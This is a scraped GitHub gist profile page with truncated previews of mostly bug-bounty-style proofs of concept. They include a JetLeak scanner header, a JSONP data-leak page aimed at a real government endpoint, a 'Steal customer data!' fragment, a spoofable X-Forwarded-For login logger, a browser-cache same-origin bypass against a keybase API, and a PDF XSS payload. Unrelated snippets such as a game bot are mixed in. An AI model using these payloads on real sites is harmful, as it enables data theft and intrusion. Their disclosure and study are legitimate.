Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
View GitHub Profile
@andripwn
andripwn / JetLeak.py
Created October 16, 2019 16:53
Vulnerable to JetLeak
import httplib, urllib, ssl, string, sys, getopt
import datetime
from urlparse import urlparse
f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')
'''
Author: Gotham Digital Science, modified by molejarka
Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether
their Jetty web server versions are vulnerable to JetLeak. Currently, this script does
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import requests
function keyDown(e){Podium={};var n=document.createEvent("KeyboardEvent");Object.defineProperty(n,"keyCode",{get:function(){return this.keyCodeVal}}),n.initKeyboardEvent?n.initKeyboardEvent("keydown",!0,!0,document.defaultView,e,e,"","",!1,""):n.initKeyEvent("keydown",!0,!0,document.defaultView,!1,!1,!1,!1,e,0),n.keyCodeVal=e,document.body.dispatchEvent(n)}function keyUp(e){Podium={};var n=document.createEvent("KeyboardEvent");Object.defineProperty(n,"keyCode",{get:function(){return this.keyCodeVal}}),n.initKeyboardEvent?n.initKeyboardEvent("keyup",!0,!0,document.defaultView,e,e,"","",!1,""):n.initKeyEvent("keyup",!0,!0,document.defaultView,!1,!1,!1,!1,e,0),n.keyCodeVal=e,document.body.dispatchEvent(n)}setInterval(function(){Runner.instance_.horizon.obstacles.length>0&&(Runner.instance_.horizon.obstacles[0].xPos<25*Runner.instance_.currentSpeed-Runner.instance_.horizon.obstacles[0].width/2&&Runner.instance_.horizon.obstacles[0].yPos>75&&(keyUp(40),keyDown(38)),Runner.instance_.horizon.obstacles[0].xPos<30*Run
function rip(a) {
alert(JSON.stringify(a[1]));
}
</script>
<script src="http://careers.lta.gov.sg/cw/en/jobs.json?callback=rip"></script>
---------------- V5 ------------------------------
---Updated on 7/19/19
----Tutorial Videos------------------------------------------------
-----How to use: https://www.youtube.com/watch?v=F_tvWzF3x18
-----Youtube Channel: https://www.youtube.com/c/Kriptutorial
<!DOCTYPE html>
<html>
<body>
<center>
<h3>Steal customer data!</h3>
<div id="demo">
</div>
<script>
@andripwn
andripwn / SIA
Created December 25, 2019 10:32
(Source IP Address Manipulation) - This plugin records the user’s IP address that has successfully logged in, using X-Forwarded-For HTTP header field.
$values = array(
'uid' => $uid,
'user_login' => $user_login,
'user_role' => $user_role,
'time' => current_time('mysql'),
'ip' => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? esc_attr($_SERVER['HTTP_X_FORWARDED_FOR']) : esc_attr($_SERVER['REMOTE_ADDR']),
'login_result' => $this->login_success,
'data' => $serialized_data,
);
@andripwn
andripwn / forcecache.html
Created December 25, 2019 17:35
SOP bypass using browser cache (https://hackerone.com/reports/761726)
<html>
<script>
var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";
fetch(url, {
method: 'GET',
cache: 'force-cache'
});
</script>
</html>
@andripwn
andripwn / aps.h
Last active January 6, 2020 17:50
(APS) Ocean Color Satellite Data Processing System - Data Structures
1
11 /*
12 * Portions based on TCL source code which is:
13 *
14 * Copyright (c) 1987-1994 The Regents of the University of California.
15 * Copyright (c) 1994-1997 Sun Microsystems, Inc.
16 * Copyright (c) 1993-1996 Lucent Technologies.
17 *
18 */
19
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")